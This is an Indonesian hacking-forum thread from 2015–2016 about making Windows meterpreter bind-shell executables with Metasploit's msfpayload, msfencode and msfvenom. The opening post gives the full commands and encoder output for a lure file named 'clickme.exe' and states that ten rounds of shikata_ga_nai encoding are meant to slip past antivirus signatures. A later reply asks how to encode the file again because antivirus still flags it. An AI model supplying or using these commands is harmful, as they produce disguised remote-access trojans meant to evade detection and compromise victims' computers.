Indonesian Back|Track Team
Share New msfvenom KaliLinux 2.- = msfpayload+msfencode - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+--- Thread: Share New msfvenom KaliLinux 2.- = msfpayload+msfencode (/thread-6667.html)



New msfvenom KaliLinux 2.- = msfpayload+msfencode - syeipto - 12-19-2015

Metasploit Framework: ‘msfvenom’
Shared Posted dari web tetangga Smile "jika sudah ada silhkan di hpus... silahkan cek di halaman    

Sekedar mengingatkan fungsi ‘msfpayload’ adalah seperti berikut:
1. 1 msfpayload ( Versi sebelumnya )



Quote:root@eniac:/opt/framework-3.7.0/msf3# ./msfpayload windows/meterpreter/bind_tcp X > /tmp/clickme.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
Length: 298
Options: {}

Command diatas akan menghasilkan file binary windows executable (exe). Payload file tersebut adalah sebuah meterpreter metasploit yang akan terhubung ke attacker menggunakan bind TCP. Karena LPORT tidak saya definisikan di sana, jadi LPORT default adalah port 4444. Jadilah file ini, kemudian coba di klik… hyahh.. ada warning antivirus


Virus Warning
Untuk itulah digunakan msfencode yang akan melakukan encode byte demi byte payload sehingga diharapkan bisa mengecoh signature antivirus

1.2 msfencode ( Versi sebelumnya )
Command untuk meng-encode payload dan keluarannya di /tmp/clickme.exe

Quote:root@eniac:/opt/framework-3.7.0/msf3# ./msfpayload windows/meterpreter/bind_tcp | ./msfencode -t exe -e x86/shikata_ga_nai -c 10 -o /tmp/clickme.exe


[*]x86/shikata_ga_nai succeeded with size 325 (iteration=1)
[*]x86/shikata_ga_nai succeeded with size 352 (iteration=2)
[*]x86/shikata_ga_nai succeeded with size 379 (iteration=3)
[*]x86/shikata_ga_nai succeeded with size 406 (iteration=4)
[*]x86/shikata_ga_nai succeeded with size 433 (iteration=5)
[*]x86/shikata_ga_nai succeeded with size 460 (iteration=6)
[*]x86/shikata_ga_nai succeeded with size 487 (iteration=7)
[*]x86/shikata_ga_nai succeeded with size 514 (iteration=8)
[*]x86/shikata_ga_nai succeeded with size 541 (iteration=9)
[*]x86/shikata_ga_nai succeeded with size 568 (iteration=10)


Proses encode menggunakan tipe x86/shikata_ga_nai dengan iterasi sebanyak 10 kali encode.





Sedangkan jika menggunakan command msfvenom, cukup satu perintah saja (perhatikan, perintah di atas ‘kan dua perintah yang dipisah ‘pipe’ atau tanda | ) tapi ‘msfvenom’ hanya seperti ini:


[*]

2.0 msfvenom ( Versi Kali linux 2.-)


Quote:
./msfvenom -p windows/meterpreter/bind_tcp -f exe -e -i 3 -s 480 RHOST=10.5.253.213 >> /tmp/clickme.exe



selesai


#maaf jika kurng jelas "post 1



RE: New msfvenom KaliLinux 2.- = msfpayload+msfencode - gnome_selpa - 12-20-2015

terimakasih thread nya, intinya sekaran msfpayload udah ngga ada lagi. sekarang pake msfvenom, dan gunakan msfvenom -h dan lihat semua commands nya. untuk melihat semua payload bisa dengan mengetikkan command msfvenom -p


RE: New msfvenom KaliLinux 2.- = msfpayload+msfencode - syeipto - 12-20-2015

hehe bener sekali sob....untuk kali sudah di upgrade ke msfvenom Smile
msfvenom = msfpayload+msfencode


RE: New msfvenom KaliLinux 2.- = msfpayload+msfencode - syeipto - 01-06-2016

Ane mau nanya di thread ane sob Big Grin berdasarkan referensi disini


ane udah bikin payloadnya dg msfvenom tapi msh trdeteksi AV ,trus berdsrkan sumber diatas ane"cmiww katanya di encode lagi (Kali linux 1.0) ...so
cara encode file .exe  di Kali linux 2.0 gimana ya sob ? 

#Terima kasih...